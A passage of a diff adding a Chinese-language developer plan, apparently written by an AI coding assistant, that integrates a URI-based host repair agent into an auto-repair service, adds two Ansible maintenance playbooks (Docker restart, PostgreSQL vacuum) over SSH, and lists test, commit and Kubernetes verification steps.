src.services.host_repair_agent import HostRepairAgent, HostRepairResult + + service = AutoRepairService.__new__(AutoRepairService) + incident = create_test_incident() + step = self._make_ssh_step("ansible://192.168.0.188/vacuum_postgres.yml") + + with patch.object(HostRepairAgent, "repair_by_uri", new_callable=AsyncMock) as mock_repair: + mock_repair.return_value = HostRepairResult( + success=False, layer="ansible", component="vacuum_postgres.yml", error="SSH timeout" + ) + result = await service._execute_step(incident, step) + + assert result.startswith("FAILED:") + assert "SSH timeout" in result +``` + +- [ ] **Step 2: 確認測試失敗** + +```bash +python -m pytest apps/api/tests/test_auto_repair_service.py::TestSshCommandIntegration -v 2>&1 | tail -10 +``` + +期望: `FAILED` — `_execute_step` 目前用舊的 `layer/component` 格式 + +- [ ] **Step 3: 修改 `auto_repair_service.py:500-513` 改用 `repair_by_uri`** + +將現有的 SSH_COMMAND 區塊(第 500-513 行)整體替換為: + +```python + # 2026-04-06 Claude Code: Sprint 3 — repair_by_uri (URI scheme 路由) + if step.action_type == ActionType.SSH_COMMAND: + from src.services.host_repair_agent import HostRepairAgent + agent = HostRepairAgent() + approved = not getattr(step, "requires_approval", False) + result = await agent.repair_by_uri(step.command, approved=approved) + if result.success: + # 勝率反饋: 寫回 Playbook success_count + if hasattr(self, "_playbook_service") and self._playbook_service: + playbook_id = getattr(incident, "_matched_playbook_id", None) + if playbook_id: + await self._playbook_service.record_execution(playbook_id, success=True) + return f"SUCCESS: {result.output}" + else: + if hasattr(self, "_playbook_service") and self._playbook_service: + playbook_id = getattr(incident, "_matched_playbook_id", None) + if playbook_id: + await self._playbook_service.record_execution(playbook_id, success=False) + return f"FAILED: {result.error}" +``` + +- [ ] **Step 4: 確認所有 auto_repair 測試通過** + +```bash +python -m pytest apps/api/tests/test_auto_repair_service.py -v +``` + +期望: 全部 `PASSED`(包含原有測試) + +- [ ] **Step 5: 跑完整測試套件確認沒有退化** + +```bash +python -m pytest apps/api/tests/ -v --ignore=apps/api/tests/e2e_network_test.py 2>&1 | tail -20 +``` + +期望: 全部 `PASSED`,zero failures + +- [ ] **Step 6: Commit** + +```bash +git add apps/api/src/services/auto_repair_service.py apps/api/tests/test_auto_repair_service.py +git commit -m "feat(api): auto_repair_service 整合 repair_by_uri + 勝率反饋 (Sprint 3 T6)" +``` + +--- + +## Task 7: Ansible Playbook 建立 + E2E 驗證 + +**Files:** +- Create: `openclaw-v5/ansible/playbooks/restart_docker_service.yml` (on .188) +- Create: `openclaw-v5/ansible/playbooks/vacuum_postgres.yml` (on .188) + +這個 task 在 .188 主機上執行,不在本地 repo。 + +- [ ] **Step 1: 在 .188 建立 `restart_docker_service.yml`** + +```bash +ssh ollama@192.168.0.188 "cat > ~/openclaw-v5/ansible/playbooks/restart_docker_service.yml << 'EOF' +--- +# restart_docker_service.yml +# 重啟指定 Docker 容器 (docker compose up -d) +# 使用方式: ansible-playbook restart_docker_service.yml -e \"service_name=sentry\" +# 2026-04-06 Claude Code: Sprint 3 Ansible Seed Playbook +- name: Restart Docker Service + hosts: all + gather_facts: false + vars: + service_name: \"unknown\" + compose_dir: \"/opt/{{ service_name }}\" + tasks: + - name: Check docker compose file exists + stat: + path: \"{{ compose_dir }}/docker-compose.yml\" + register: compose_file + failed_when: not compose_file.stat.exists + + - name: Restart service via docker compose + shell: cd {{ compose_dir }} && docker compose up -d + register: result + + - name: Print result + debug: + msg: \"REPAIR_OK:{{ service_name }} restarted. {{ result.stdout }}\" +EOF +echo 'Created restart_docker_service.yml'" +``` + +- [ ] **Step 2: 在 .188 建立 `vacuum_postgres.yml`** + +```bash +ssh ollama@192.168.0.188 "cat > ~/openclaw-v5/ansible/playbooks/vacuum_postgres.yml << 'EOF' +--- +# vacuum_postgres.yml +# 清理 PostgreSQL 磁碟空間 (VACUUM FULL ANALYZE) +# 2026-04-06 Claude Code: Sprint 3 Ansible Seed Playbook +- name: Vacuum PostgreSQL + hosts: db + gather_facts: false + tasks: + - name: Run VACUUM FULL ANALYZE + become: true + become_user: postgres + shell: psql -c \"VACUUM FULL ANALYZE;\" + register: vacuum_result + + - name: Check disk usage after vacuum + shell: df -h /var/lib/postgresql/ + register: disk_result + + - name: Print result + debug: + msg: \"REPAIR_OK:vacuum_postgres completed. {{ vacuum_result.stdout }}. Disk: {{ disk_result.stdout }}\" +EOF +echo 'Created vacuum_postgres.yml'" +``` + +- [ ] **Step 3: E2E 測試 — 從 K3s Pod 發出 openclaw:// 修復** + +```bash +# 找到 awoooi-api pod +ssh wooo@192.168.0.120 "kubectl get pods -n awoooi-prod | grep awoooi-api" + +# 模擬呼叫 auto-repair evaluate,確認 SSH_COMMAND playbook 能被匹配 +ssh wooo@192.168.0.120 "curl -s http://192.168.0.125:32334/api/v1/playbooks/ | \ + python3 -c \"import json,sys; pbs=json.load(sys.stdin)['items']; \ + [print(p['playbook']['name'], p['playbook']['status']) for p in pbs if 'ssh_command' in str(p)]\"" +``` + +- [ ] **Step 4: Push 到 Gitea 觸發 CD** + +```bash +git push gitea main +``` + +等待 CD pipeline 成功(約 8 分鐘),確認新版本 Pod 啟動。 + +- [ ] **Step 5: 確認 Pod 有新版本** + +```bash +ssh wooo@192.168.0.120 "kubectl get pods -n awoooi-prod -l app=awoooi-api -o jsonpath='{.items[0].metadata.name}' | xargs -I{} kubectl exec {} -n awoooi-prod -- python3 -c \"from src.services.host_repair_agent import parse_uri_command; r=parse_uri_command('openclaw://docker-110/sentry'); print('OK:', r.scheme)\"" +``` + +期望: `OK: openclaw` + +--- + +## Self-Review 檢查 + +**Spec coverage:** +- ✅ A1: known_hosts — Task 2 + Task 3 Step 5 +- ✅ A2: ConfigMap 白名單 — Task 2 + Task 3 `validate_ansible_playbook` +- ✅ A3: Shell Injection — Task 1 `validate_shell_safety` + Task 3 `ssh://` 路徑 +- ✅ B1: AuditLog PostgreSQL — Task 5 +- ✅ B2: Langfuse Trace — Task 5 +- ✅ C1: Redis 冪等鎖 — Task 4 +- ✅ C2: 勝率反饋 — Task 6 `record_execution` +- ✅ C3: .188 執行節點 — Task 3 `_execute_ansible` (ANSIBLE_CONTROL_HOST 強制 .188) + +**Placeholder scan:** 無 TBD / TODO。所有程式碼都是完整實作。 + +**Type consistency:** `HostRepairResult` dataclass 在 Task 1 定義(已存在),所有後續 task 返回同一型別。`repair_by_uri(command: str, approved: bool = False) -> HostRepairResult` 在 Task 3 定義,Task 4/5/6 都正確使用此簽名。